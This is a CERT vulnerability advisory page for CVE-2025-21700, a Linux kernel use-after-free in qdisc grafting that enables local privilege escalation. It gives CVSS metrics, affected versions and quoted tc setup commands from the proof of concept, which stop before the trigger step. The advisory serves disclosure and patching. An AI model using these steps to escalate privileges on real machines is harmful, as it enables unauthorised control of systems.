Instituto Nacional de ciberseguridad. Sección Incibe
Instituto Nacional de Ciberseguridad. Sección INCIBE-CERT

Go to Calendar     Go to Press Room     Go to Newsletters subscription

Search

CVE-2025-21700

Severity CVSS v4.0:
Pending analysis
Type:
CWE-416 Use After Free
Publication date:
13/02/2025
Last modified:
24/03/2025

Description

In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> net: sched: Disallow replacing of child qdisc from one parent to another<br /> <br /> Lion Ackermann was able to create a UAF which can be abused for privilege<br /> escalation with the following script<br /> <br /> Step 1. create root qdisc<br /> tc qdisc add dev lo root handle 1:0 drr<br /> <br /> step2. a class for packet aggregation do demonstrate uaf<br /> tc class add dev lo classid 1:1 drr<br /> <br /> step3. a class for nesting<br /> tc class add dev lo classid 1:2 drr<br /> <br /> step4. a class to graft qdisc to<br /> tc class add dev lo classid 1:3 drr<br /> <br /> step5.<br /> tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024<br /> <br /> step6.<br /> tc qdisc add dev lo parent 1:2 handle 3:0 drr<br /> <br /> step7.<br /> tc class add dev lo classid 3:1 drr<br /> <br /> step 8.<br /> tc qdisc add dev lo parent 3:1 handle 4:0 pfifo<br /> <br /> step 9. Display the class/qdisc layout<br /> <br /> tc class ls dev lo<br /> class drr 1:1 root leaf 2: quantum 64Kb<br /> class drr 1:2 root leaf 3: quantum 64Kb<br /> class drr 3:1 root leaf 4: quantum 64Kb<br /> <br /> tc qdisc ls<br /> qdisc drr 1: dev lo root refcnt 2<br /> qdisc plug 2: dev lo parent 1:1<br /> qdisc pfifo 4: dev lo parent 3:1 limit 1000p<br /> qdisc drr 3: dev lo parent 1:2<br /> <br /> step10. trigger the bug

Impact

Vector 3.x
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVSS v3.1 Severity and Metrics:

Base Score: 7.80 HIGH
Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Attack Vector (AV): Local
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

Base Score 3.x
7.80
Severity 3.x
HIGH

Vulnerable products and versions

CPE From Up to
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* 2.6.12 (including) 5.4.291 (excluding)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* 5.5 (including) 5.10.235 (excluding)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* 5.11 (including) 5.15.179 (excluding)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* 5.16 (including) 6.1.129 (excluding)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* 6.2 (including) 6.6.76 (excluding)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* 6.7 (including) 6.12.13 (excluding)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* 6.13 (including) 6.13.2 (excluding)

To consult the complete list of CPE names with products and versions, see this page


References to Advisories, Solutions, and Tools